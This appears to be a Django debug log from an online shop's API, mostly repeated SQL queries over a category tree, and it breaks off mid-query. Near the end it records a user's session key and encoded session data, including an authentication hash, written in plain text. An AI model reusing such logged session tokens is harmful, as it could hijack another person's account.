12:20:44,010 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:20:44,016 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:20:44,018 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:20:44,021 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:20:44,023 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:20:44,026 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:20:44,028 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:20:44,030 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:20:44,033 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:20:44,035 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:20:44,038 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:20:44] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:22:16,095 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:22:16,101 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:22:16,104 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:22:16,107 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:22:16,109 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:22:16,111 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:22:16,114 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:22:16,116 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:22:16,118 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:22:16,120 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:22:16,123 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:22:16] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:22:50,932 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:22:50,939 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:22:50,942 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:22:50,944 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:22:50,947 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:22:50,949 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:22:50,952 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:22:50,954 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:22:50,957 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:22:50,960 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:22:50,963 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:22:50] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:22:51,142 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:22:51,150 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 12:22:51] "GET /api/v1/categories/6 HTTP/1.0" 200 181 DEBUG 2019-12-13 12:22:54,252 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:22:54,259 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:22:54,262 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:22:54,266 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:22:54,269 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:22:54,272 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:22:54,275 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:22:54,278 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:22:54,281 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:22:54,284 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:22:54,289 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:22:54] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:22:57,479 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:22:57,484 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:22:57,486 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:22:57,488 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:22:57,490 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:22:57,493 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:22:57,495 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:22:57,497 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:22:57,499 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:22:57,501 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:22:57,504 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:22:57] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:22:57,526 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:22:57,534 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 12:22:57] "GET /api/v1/categories/6 HTTP/1.0" 200 181 DEBUG 2019-12-13 12:23:13,370 utils 11259 139831538779904 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:23:13.356213+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 23, 13, 356213, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:23:13,375 utils 11259 139831538779904 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:23:13,429 utils 11259 139831538779904 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-13 12:23:13,443 utils 11259 139831538779904 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:23:13.440822+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 23, 13, 440822, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:23:13] "GET / HTTP/1.0" 200 8892 DEBUG 2019-12-13 12:23:14,587 utils 11259 139831538779904 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:23:14.578323+00:00'::timestamptz AND "django_session"."session_key" = 